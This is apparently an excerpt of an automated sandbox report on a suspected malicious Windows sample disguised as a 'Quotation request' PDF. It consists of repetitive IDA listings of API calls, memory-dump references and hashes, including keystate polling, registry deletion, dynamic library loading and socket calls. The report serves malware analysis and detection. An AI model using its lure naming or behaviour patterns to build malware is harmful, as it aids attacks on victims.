• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Handle
• String ID: nul
• API String ID: 2519475695-2873401336
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID:
• String ID: SysAnimate32
• API String ID: 0-1011021900
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
• GetFocus.USER32 ref: 0046157B
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
• GetClassNameW.USER32(?,?,00000100), ref: 004615C4
• EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
• __swprintf.LIBCMT ref: 00461608
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
• String ID: %s%d
• API String ID: 2645982514-1110647743
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetCurrentProcessId.KERNEL32(?), ref: 0047584D
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
• CloseHandle.KERNEL32(00000000), ref: 00475A4D
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
APIs
• LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
• GetProcAddress.KERNEL32(?,?), ref: 004648F7
• GetProcAddress.KERNEL32(?,00000000), ref: 00464916
• GetProcAddress.KERNEL32(?,?), ref: 0046495A
• FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID:
• API String ID: 2449869053-0
APIs
• GetCursorPos.USER32(?), ref: 004563A6
• ScreenToClient.USER32(?,?), ref: 004563C3
• GetAsyncKeyState.USER32(?), ref: 00456400
• GetAsyncKeyState.USER32(?), ref: 00456410
• GetWindowLongW.USER32(?,000000F0), ref: 00456466
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: AsyncState$ClientCursorLongScreenWindow
• String ID:
• API String ID: 3539004672-0
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
• Sleep.KERNEL32(0000000A), ref: 0047D455
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
Memory Dump Source
• Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID:
• API String ID: 327565842-0
                                                                    • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                    • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                    • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                    • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                    APIs
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                    • String ID:
                                                                    • API String ID: 2832842796-0
                                                                    • Opcode ID: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                                    • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                    • Opcode Fuzzy Hash: 80413c63c247ca5a6c50c863bbc5616d4301eed01054a3e2b3b6367dcd347471
                                                                    • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                    APIs
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Enum$CloseDeleteOpen
                                                                    • String ID:
                                                                    • API String ID: 2095303065-0
                                                                    • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                    • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                    • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                    • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: RectWindow
                                                                    • String ID:
                                                                    • API String ID: 861336768-0
                                                                    • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                    • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                    • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                    • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 00449598
                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                    • _wcslen.LIBCMT ref: 0044960D
                                                                    • _wcslen.LIBCMT ref: 0044961A
                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                                    • String ID:
                                                                    • API String ID: 1856069659-0
                                                                    • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                    • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                    • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                    • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                    • TrackPopupMenuEx.USER32(03396460,00000000,00000000,?,?,00000000), ref: 00447991
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                    • String ID:
                                                                    • API String ID: 1300944170-0
                                                                    • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                    • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                    • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                    • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 1822080540-0
                                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                    • String ID:
                                                                    • API String ID: 659298297-0
                                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                    APIs
                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(03391B88,000000F1,00000000,00000000), ref: 00440E6E
                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(03391B88,000000F1,00000001,00000000), ref: 00440E9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                    • String ID:
                                                                    • API String ID: 142311417-0
                                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
APIs
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
